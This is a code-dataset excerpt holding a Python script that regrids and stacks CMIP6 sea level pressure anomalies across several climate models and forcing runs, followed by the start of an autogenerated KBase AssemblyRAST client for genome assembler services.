# forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/WIND_historical/uas_Amon_ACCESS-ESM1-5_historical_r10i1p1f1_gn_185001-201412.nc')
# a=int(forcing.sizes['time']/12)
# output=regrid_anomaly(forcing,a)
# mylist=xr.concat([mylist,output], 'ens_member')
mylist=xr.concat([output], 'ens_member')
ens_number=['r1']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_historical_FGOALS.nc')
#######################
forcing=xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_FGOALS-g3_hist-GHG_r1i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
# forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/WIND_historical/uas_Amon_ACCESS-ESM1-5_historical_r10i1p1f1_gn_185001-201412.nc')
# a=int(forcing.sizes['time']/12)
# output=regrid_anomaly(forcing,a)
# mylist=xr.concat([mylist,output], 'ens_member')
mylist=xr.concat([output], 'ens_member')
ens_number=['r1']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_GHGonly_FGOALS.nc')
#######################
forcing=xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_FGOALS-g3_hist-aer_r1i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
# forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/WIND_historical/uas_Amon_ACCESS-ESM1-5_historical_r10i1p1f1_gn_185001-201412.nc')
# a=int(forcing.sizes['time']/12)
# output=regrid_anomaly(forcing,a)
# mylist=xr.concat([mylist,output], 'ens_member')
mylist=xr.concat([output], 'ens_member')
ens_number=['r1']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_aer_FGOALS.nc')
#%%
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_GFDL-ESM4_historical_r1i1p1f1_gr1_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_GFDL-ESM4_historical_r2i1p1f1_gr1_185001-194912.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_historical_GFDL-ESM4.nc')
#######################
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_GFDL-ESM4_hist-piAer_r1i1p1f1_gr1_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
mylist=xr.concat([output], 'ens_member')
ens_number=['r1']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_GHGonly_GFDL-ESM4.nc')
#######################
forcing = xr.open_mfdataset('//Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_GFDL-ESM4_hist-aer_r1i1p1f1_gr1_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
mylist=xr.concat([output], 'ens_member')
ens_number=['r1']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_aer_GFDL-ESM4.nc')
#%%
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_GISS-E2-1-G_historical_r2i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_GISS-E2-1-G_historical_r4i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_GISS-E2-1-G_historical_r5i1p3f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_GISS-E2-1-G_historical_r6i1p1f2_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3','r4']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_historical_GISS-E2-1-G.nc')
#######################
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_GISS-E2-1-G_hist-GHG_r1i1p1f2_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_GISS-E2-1-G_hist-GHG_r2i1p1f2_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_GISS-E2-1-G_hist-GHG_r3i1p1f2_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_GISS-E2-1-G_hist-GHG_r4i1p1f2_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3','r4']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_GHGonly_GISS-E2-1-G.nc')
#######################
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_GISS-E2-1-G_hist-aer_r2i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_GISS-E2-1-G_hist-aer_r3i1p3f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_GISS-E2-1-G_hist-aer_r4i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_GISS-E2-1-G_hist-aer_r5i1p3f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3','r4']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_aer_GISS-E2-1-G.nc')
#######################
#%%
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_HadGEM3-GC31-LL_historical_r2i1p1f3_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_HadGEM3-GC31-LL_historical_r3i1p1f3_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_historical_HadGEM3-GC31-LL.nc')
#######################
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_HadGEM3-GC31-LL_hist-GHG_r1i1p1f3_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_HadGEM3-GC31-LL_hist-GHG_r4i1p1f3_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_GHGonly_HadGEM3-GC31-LL.nc')
#######################
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_HadGEM3-GC31-LL_hist-aer_r1i1p1f3_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_HadGEM3-GC31-LL_hist-aer_r4i1p1f3_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_aer_HadGEM3-GC31-LL.nc')
#######################
#%%
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_IPSL-CM6A-LR_historical_r23i1p1f1_gr_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_IPSL-CM6A-LR_historical_r25i1p1f1_gr_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_IPSL-CM6A-LR_historical_r26i1p1f1_gr_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_historical_IPSL-CM6A-LR.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_IPSL-CM6A-LR_hist-GHG_r1i1p1f1_gr_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_IPSL-CM6A-LR_hist-GHG_r2i1p1f1_gr_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_IPSL-CM6A-LR_hist-GHG_r3i1p1f1_gr_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_GHGonly_IPSL-CM6A-LR.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_IPSL-CM6A-LR_hist-aer_r1i1p1f1_gr_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_IPSL-CM6A-LR_hist-aer_r3i1p1f1_gr_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('//Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_IPSL-CM6A-LR_hist-aer_r4i1p1f1_gr_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_aer_IPSL-CM6A-LR.nc')
#%%
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_MIROC6_historical_r1i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_MIROC6_historical_r3i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_historical_MIROC6.nc')
#######################
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_MIROC6_hist-GHG_r1i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_MIROC6_hist-GHG_r2i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_GHGonly_MIROC6.nc')
#######################
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_MIROC6_hist-aer_r1i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_MIROC6_hist-aer_r2i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_aer_MIROC6.nc')
#%%
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_MRI-ESM2-0_historical_r1i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_MRI-ESM2-0_historical_r2i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_MRI-ESM2-0_historical_r3i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_historical_MRI-ESM2-0.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_MRI-ESM2-0_hist-GHG_r1i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_MRI-ESM2-0_hist-GHG_r2i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('//Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_MRI-ESM2-0_hist-GHG_r3i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_GHGonly_MRI-ESM2-0.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_MRI-ESM2-0_hist-aer_r1i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_MRI-ESM2-0_hist-aer_r2i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_MRI-ESM2-0_hist-aer_r3i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_aer_MRI-ESM2-0.nc')
| 36.323077
| 159
| 0.766382
| 4,961
| 33,054
| 4.80387
| 0.032252
| 0.065962
| 0.093446
| 0.084592
| 0.970334
| 0.967103
| 0.967103
| 0.961438
| 0.961438
| 0.961438
| 0
| 0.060315
| 0.063532
| 33,054
| 909
| 160
| 36.363036
| 0.709601
| 0.056574
| 0
| 0.736138
| 0
| 0
| 0.422175
| 0.353521
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001912
| false
| 0
| 0.011472
| 0
| 0.015296
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
230056ee366a3f4894299516bcfe5cac0df21a85
| 15,067
|
py
|
Python
|
lib/AssemblyRAST/AssemblyRASTClient.py
|
mclark58/ARAST_SDK
|
76a2abd30a6d6fabcf3700d05e8b025a62dfaaad
|
[
"MIT"
] | null | null | null |
lib/AssemblyRAST/AssemblyRASTClient.py
|
mclark58/ARAST_SDK
|
76a2abd30a6d6fabcf3700d05e8b025a62dfaaad
|
[
"MIT"
] | 15
|
2016-10-26T03:32:34.000Z
|
2019-01-30T22:15:08.000Z
|
lib/AssemblyRAST/AssemblyRASTClient.py
|
mclark58/ARAST_SDK
|
76a2abd30a6d6fabcf3700d05e8b025a62dfaaad
|
[
"MIT"
] | 14
|
2016-09-08T19:40:28.000Z
|
2019-05-17T17:01:45.000Z
|
# -*- coding: utf-8 -*-
############################################################
#
# Autogenerated by the KBase type compiler -
# any changes made here will be overwritten
#
############################################################
from __future__ import print_function
# the following is a hack to get the baseclient to import whether we're in a
# package or not. This makes pep8 unhappy hence the annotations.
try:
# baseclient and this client are in a package
from .baseclient import BaseClient as _BaseClient # @UnusedImport
except:
# no they aren't
from baseclient import BaseClient as _BaseClient # @Reimport
class AssemblyRAST(object):
def __init__(
self, url=None, timeout=30 * 60, user_id=None,
password=None, token=None, ignore_authrc=False,
trust_all_ssl_certificates=False,
auth_svc='https://kbase.us/services/authorization/Sessions/Login'):
if url is None:
raise ValueError('A url is required')
self._service_ver = None
self._client = _BaseClient(
url, timeout=timeout, user_id=user_id, password=password,
token=token, ignore_authrc=ignore_authrc,
trust_all_ssl_certificates=trust_all_ssl_certificates,
auth_svc=auth_svc)
def run_kiki(self, params, context=None):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
return self._client.call_method(
'AssemblyRAST.run_kiki',
[params], self._service_ver, context)
def run_velvet(self, params, context=None):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
return self._client.call_method(
'AssemblyRAST.run_velvet',
[params], self._service_ver, context)
def run_miniasm(self, params, context=None):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
return self._client.call_method(
'AssemblyRAST.run_miniasm',
[params], self._service_ver, context)
def run_spades(self, params, context=None):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
return self._client.call_method(
'AssemblyRAST.run_spades',
[params], self._service_ver, context)
def run_idba(self, params, context=None):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
return self._client.call_method(
'AssemblyRAST.run_idba',
[params], self._service_ver, context)
def run_megahit(self, params, context=None):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
return self._client.call_method(
'AssemblyRAST.run_megahit',
[params], self._service_ver, context)
def run_ray(self, params, context=None):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
return self._client.call_method(
'AssemblyRAST.run_ray',
[params], self._service_ver, context)
def run_masurca(self, params, context=None):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
return self._client.call_method(
'AssemblyRAST.run_masurca',
[params], self._service_ver, context)
def run_a5(self, params, context=None):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
return self._client.call_method(
'AssemblyRAST.run_a5',
[params], self._service_ver, context)
def run_a6(self, params, context=None):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
return self._client.call_method(
'AssemblyRAST.run_a6',
[params], self._service_ver, context)
def run_arast(self, params, context=None):
"""
